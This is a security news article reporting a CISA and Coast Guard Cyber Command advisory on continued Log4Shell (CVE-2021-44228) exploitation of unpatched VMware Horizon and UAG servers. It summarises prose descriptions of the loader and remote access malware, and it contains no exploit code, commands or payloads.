Cyber actors continue to exploit Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon Systems (updated)

Cybersecurity experts warn cyber actors continue to exploit the Log4Shell vulnerability in VMware Horizon Systems.

Updated July 20, 2022: This post has been updated to include new indicators of compromise (IoC) as provided in CISA malware analysis report on July 18.

Last December, researchers had discovered the Critical Log4Shell vulnerability (CVE-2021-44228) in Apache Log4j logging utility that can result in remote code execution (RCE) by logging a certain string. The severe flaw affected many consumer and enterprise services, websites, applications, and other products

Researchers and technology vendors soon followed with new reports of multiple exploits against Log4Shell, such as cyberattacks from Aquatic Panda and Deep Panda. This past April, researchers discovered millions of Java applications were still vulnerable in the wild to Log4Shell.

In a new joint cybersecurity advisory, the Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) warned cyber threat actors continue to exploit CVE-2021-44228 in unpatched VMware Horizon and Unified Access Gateway (UAG) servers. The bad actors also include state-sponsored advanced persistent threat (APT) actors.

“Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),” CISA wrote in the alert.

In December 2021, VMware released a patch for CVE-2021-44228 and also confirmed exploitation in the wild at that time.

After performing an onsite incident response engagement for a customer from April to May 2022, CISA discovered evidence of actors exploiting an unpatched VMware Horizon server earlier this year starting in January.

CISA also observed a second threat actor group had access to another organization’s test and production environments. As a result, the actor also exploited CVE-2022-22954 to implant the Dingo J-spy webshell.

Latest malware reports

CISA and CGCYBER previously released two related Malware Analysis Reports (MAR)-10382580-1, and MAR-10382254-1 after discovering new malware samples from affected victims of Log4Shell exploits.

New IoCs were also added as part of  MAR-10382580-2 published on July 18, 2022:

“This file is a malicious loader that contains an embedded executable. This embedded executable is a Remote Access Tool (RAT) that provides a vast array of Command and Control (C2) capabilities. These C2 capabilities include the ability to remotely monitor a system’s desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payloads. The malware can also function as a proxy, allowing a remote operator to pivot to other systems,” CISA noted in the report.

Related Articles